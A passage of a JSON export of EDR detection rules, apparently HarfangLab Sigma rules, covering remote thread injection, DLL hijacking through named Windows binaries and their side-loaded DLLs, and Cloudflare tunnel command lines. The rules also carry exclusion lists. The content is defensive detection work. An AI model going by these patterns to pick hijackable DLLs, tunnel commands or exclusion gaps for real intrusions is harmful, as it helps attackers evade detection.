'\\bin\\jmap.exe'\n - '\\bin\\keytool.exe'\n - '\\eclipse.exe'\n - '\\pc-client.exe' # papercut\n - '\\Jaspersoft Studio.exe' # TIBCO\\Jaspersoft Studio\n - '\\SpringToolSuite4.exe'\n - '\\SpringToolSuite.exe'\n exclusion_anydesk:\n SourceImage|contains: 'anydesk'\n TargetImage: '?:\\Windows\\System32\\dwm.exe'\n exclusion_clink:\n SourceImage|endswith: 'clink\\clink_x64.exe'\n TargetImage: '?:\\Windows\\System32\\cmd.exe'\n exclusion_taskbar:\n SourceImage|endswith: '7+ Taskbar Tweaker\\7+ Taskbar Tweaker.exe'\n TargetImage: '?:\\Windows\\explorer.exe'\n exclusion_mcafee:\n - SourceImage:\n - '?:\\ProgramData\\McAfee\\Agent\\Evaluation\\ENDP_*\\Install\\0000\\\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Evaluation\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Current\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - '?:\\ProgramData\\McAfee\\Agent\\Previous\\ENDP_*\\Install\\0000\\mfeepmpk_utility.exe'\n - SourceImage|endswith: '\\mfeepmpk_utility.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'Musarubra US LLC'\n exclusion_svchost32b:\n SourceImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n TargetImage:\n - '?:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n - '?:\\Windows\\winsxs\\wow64_microsoft-windows-*\\iexplore.exe'\n exclusion_svchost64b:\n SourceImage: '?:\\Windows\\System32\\svchost.exe'\n TargetImage: '?:\\Windows\\System32\\SppExtComObj.Exe'\n exclusion_Netwrix:\n SourceImage: '?:\\Windows\\Netwrix Auditor\\Netwrix Auditor Mailbox Access Core Service\\NombaAgent64.exe'\n TargetImage: '?:\\Program Files\\Microsoft\\Exchange Server\\V14\\Bin\\store.exe'\n exclusion_powercfg:\n SourceImage: '?:\\Windows\\System32\\powercfg.exe'\n TargetImage: '?:\\Windows\\System32\\svchost.exe'\n exclusion_rpcnet:\n - SourceImage: '?:\\Windows\\SysWOW64\\rpcnet.exe'\n TargetImage:\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n - '?:\\Windows\\SysWOW64\\svchost.exe'\n - '?:\\Windows\\winsxs\\x86_*\\svchost.exe'\n - ProcessParentImage: '?:\\Windows\\SysWOW64\\rpcnet.exe'\n SourceImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n TargetImage: '?:\\Windows\\SysWOW64\\OpenWith.exe'\n exclusion_rpcnetp:\n SourceImage: '?:\\Windows\\System32\\rpcnetp.exe'\n TargetImage: '?:\\Windows\\SysWOW64\\svchost.exe'\n exclusion_office:\n SourceImage: '?:\\Windows\\System32\\SppExtComObjPatcher.exe'\n TargetImage:\n - '?:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE'\n - '?:\\Windows\\System32\\SppExtComObj.Exe'\n exclusion_rundll32:\n SourceImage: '?:\\Windows\\System32\\rundll32.exe'\n TargetImage:\n - '?:\\Windows\\System32\\SppExtComObj.Exe'\n - '?:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\dwm.exe'\n - '?:\\Windows\\System32\\SearchIndexer.exe'\n - '?:\\Windows\\servicing\\TrustedInstaller.exe'\n - '?:\\Windows\\System32\\Defrag.exe'\n exclusion_winlogon:\n SourceImage: '?:\\Windows\\System32\\winlogon.exe'\n TargetImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '?:\\Windows\\System32\\services.exe'\n - '?:\\Windows\\System32\\wininit.exe'\n - '?:\\Windows\\System32\\ssText3d.scr'\n - '?:\\Windows\\System32\\scrnsave.scr'\n - '?:\\Windows\\System32\\PhotoScreensaver.scr'\n exclusion_old_agent_compatibility: # Exclude some windows binaries due to high fp volume on older agents\n SourceImage:\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\winsxs\\x86_*\\svchost.exe'\n - '?:\\Windows\\explorer.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n exclusion_seclore_processwatcher:\n SourceImage|endswith: 'Seclore\\FileSecure\\Desktop Client\\x64\\ProcessWatcher64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Seclore Technology Private Limited'\n exclusion_werfault:\n ProcessCommandLine|contains:\n - '/h /shared'\n - '-u -p * -s *'\n SourceImage: '*\\werfault.exe'\n exclusion_final_code:\n SourceImage|endswith: 'FinalCode\\Application\\FinalCodeLauncher.exe'\n TargetImage|endswith: 'FinalCode\\Application\\UIServer.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Digital Arts Inc.'\n - 'FinalCode, Inc.'\n exclusion_mavinject_appvclient:\n ProcessOriginalFileName:\n - 'mavinject32.exe'\n - 'mavinject64.exe'\n TargetImage|endswith: 'explorer.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentOriginalFileName: 'AppVClient.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Microsoft Windows'\n exclusion_syspin:\n ProcessOriginalFileName: 'syspin.exe'\n TargetImage: '?:\\Windows\\explorer.exe'\n exclusion_nirsfot_ruasdate:\n ProcessOriginalFileName: 'RunAsDate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Nir Sofer'\n exclusion_gotoassist:\n ProcessProcessName: 'GoToAssistTools64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'LogMeIn, Inc.'\n - 'GoTo Technologies USA, LLC'\n exclusion_talendstudio:\n SourceImage: '?:\\Users\\\\*\\Talend-Studio-*.exe'\n TargetImage:\n - '?:\\Users\\\\*\\AppData\\Local\\DBeaver\\dbeaver.exe'\n - '?:\\Users\\\\*\\Talend-Studio-*.exe'\n - '?:\\Program Files*\\Java\\jr*\\bin\\java.exe'\n exclusion_conemu:\n ProcessProcessName: 'cmd.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentProcessName: 'ConEmuC64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Maksim Moisiuk'\n exclusion_ESET:\n ProcessProcessName: 'rundll32.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentProcessName: 'ekrn.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'ESET, spol. s r.o.'\n exclusion_discord:\n ProcessImage|endswith: '\\Discord\\app-*\\modules\\discord_hook-1\\discord_hook\\\\*\\DiscordHookHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Discord Inc.'\n exclusion_audials:\n ProcessImage:\n - '?:\\ProgramData\\Audials\\Audials 2025\\CaptureBackend\\HookHelper32.exe'\n - '?:\\ProgramData\\Audials\\Audials 2025\\CaptureBackend\\HookHelper64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Audials AG'\n exclusion_RPCDnD:\n ProcessImage: '?:\\ProgramData\\RPCDnD\\HelpDesk\\RemotePCDnDLauncher.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'IDrive, Inc.'\n exclusion_jdk_mission_control:\n ProcessImage|endswith: 'JDK Mission Control\\jmc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n exclusion_teruten:\n ProcessOriginalFileName:\n - 'TCubeObserver.exe'\n - 'TDepend64.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Teruten Inc.'\n - 'Teruten, Inc.'\n exclusion_quest:\n ProcessOriginalFileName: 'BTPassSvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QUEST SOFTWARE INC.'\n exclusion_wps_office:\n ProcessImage|endswith: '\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\pinTaskbar.exe'\n ProcessParentImage|endswith: '\\AppData\\Local\\Kingsoft\\WPS Office\\\\*\\office6\\ksomisc.exe'\n exclusion_roblox:\n SourceImage|endswith: '\\RobloxPlayerBeta.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Roblox Corporation'\n exclusion_windhawk:\n SourceImage|endswith: '\\windhawk.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Michael Maltsev'\n exclusion_everest:\n SourceImage|endswith: '\\EGH\\Outils_EGH\\OWDLC64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Everest Software International Pty Ltd'\n exclusion_jetbrains:\n SourceImage|endswith: '\\bin\\phpstorm64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JetBrains s.r.o.'\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f69ffe6-5b1a-43bb-b560-4d69ff1d5166",
"rule_name": "Remote Thread Created from Process in Uncommon Location",
"rule_description": "Detects suspicious remote threads that are not mapped to a legitimate DLL/executable and created by a process in an uncommon location.\nAdversaries may inject malicious code in a web browser (ie. Firefox, Chrome, Edge...) or in LSASS to steal sensitive information such as credentials.\nIf the thread is injected in another process, it could be an attempt at performing malicious activity within a legitimate process.\nIt is recommended to investigate the process injecting the thread and the injected process for suspicious activity such as uncommon network connections or child processes.\n",
"rule_creation_date": "2023-12-11",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f6edf60-02f1-41f9-b54d-aaa7346dc347",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085456Z",
"creation_date": "2026-03-23T11:45:34.085458Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085463Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fxssvc.yml",
"content": "title: DLL Hijacking via fxssvc.exe\nid: 7f6edf60-02f1-41f9-b54d-aaa7346dc347\ndescription: |\n Detects potential Windows DLL Hijacking via fxssvc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fxssvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\credui.dll'\n - '\\FXSTIFF.dll'\n - '\\IPHLPAPI.DLL'\n - '\\PROPSYS.dll'\n - '\\TAPI32.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f6edf60-02f1-41f9-b54d-aaa7346dc347",
"rule_name": "DLL Hijacking via fxssvc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fxssvc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f759930-847b-4235-9966-1f185ec8f57a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094433Z",
"creation_date": "2026-03-23T11:45:34.094435Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094440Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qappsrv.yml",
"content": "title: DLL Hijacking via qappsrv.exe\nid: 7f759930-847b-4235-9966-1f185ec8f57a\ndescription: |\n Detects potential Windows DLL Hijacking via qappsrv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qappsrv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\netapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f759930-847b-4235-9966-1f185ec8f57a",
"rule_name": "DLL Hijacking via qappsrv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qappsrv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593327Z",
"creation_date": "2026-03-23T11:45:34.593330Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593338Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://itm4n.github.io/windows-dll-hijacking-clarified/",
"https://twitter.com/Alh4zr3d/status/1567937830911111168",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wptsextensions.yml",
"content": "title: DLL Hijacking via WptsExtension.dll\nid: 7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5\ndescription: |\n Detects a potential Windows DLL Hijacking via WptsExtension.dll.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://itm4n.github.io/windows-dll-hijacking-clarified/\n - https://twitter.com/Alh4zr3d/status/1567937830911111168\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\WptsExtensions.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f7c3ab6-0a47-45d3-a6d4-b483fe3bcdb5",
"rule_name": "DLL Hijacking via WptsExtension.dll",
"rule_description": "Detects a potential Windows DLL Hijacking via WptsExtension.dll.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079468Z",
"creation_date": "2026-03-23T11:45:34.079470Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079474Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_hvax64.yml",
"content": "title: DLL Hijacking via hvax64.exe\nid: 7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a\ndescription: |\n Detects potential Windows DLL Hijacking via hvax64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvax64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\KDSTUB.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f7ec5e5-0ec3-44e4-8cf0-cf1aaf2c3e5a",
"rule_name": "DLL Hijacking via hvax64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvax64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7f9cb333-f034-466f-aad5-843bbfe120c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.612759Z",
"creation_date": "2026-03-23T11:45:34.612763Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612770Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cloudflare/cloudflared",
"https://blog.reconinfosec.com/emergence-of-akira-ransomware-group",
"https://attack.mitre.org/techniques/T1572/"
],
"name": "t1572_linux_cloudfare_tunneling_cmdline.yml",
"content": "title: Cloudflare Tunneling via Command-line\nid: 7f9cb333-f034-466f-aad5-843bbfe120c6\ndescription: |\n Detects a command-line associated with the Cloudflare Tunnel Client.\n Cloudflare is a tunneling daemon that proxies traffic from the Cloudflare network.\n Threat actors such as the Akira Ransomware Group use this client to silently tunnel their traffic into internal networks.\n It is recommended to investigate the process' and daemon's network activity to determine the legitimacy of this action.\nreferences:\n - https://github.com/cloudflare/cloudflared\n - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group\n - https://attack.mitre.org/techniques/T1572/\ndate: 2023/05/11\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1572\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Tunneling\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - 'tunnel * run --token'\n - 'tunnel * --config * run'\n\n exclusion_containers:\n Ancestors|contains: '/usr/bin/containerd-shim-runc-v2'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7f9cb333-f034-466f-aad5-843bbfe120c6",
"rule_name": "Cloudflare Tunneling via Command-line",
"rule_description": "Detects a command-line associated with the Cloudflare Tunnel Client.\nCloudflare is a tunneling daemon that proxies traffic from the Cloudflare network.\nThreat actors such as the Akira Ransomware Group use this client to silently tunnel their traffic into internal networks.\nIt is recommended to investigate the process' and daemon's network activity to determine the legitimacy of this action.\n",
"rule_creation_date": "2023-05-11",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7ff782ca-cc4a-457f-899f-ba46c4f967a0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081538Z",
"creation_date": "2026-03-23T11:45:34.081540Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081544Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/msedge_pwa_launcher.exe-42D1DD5306CDE965B76373E4E2E210A3.html"
],
"name": "t1574_001_dll_hijacking_msedgepwalauncher.yml",
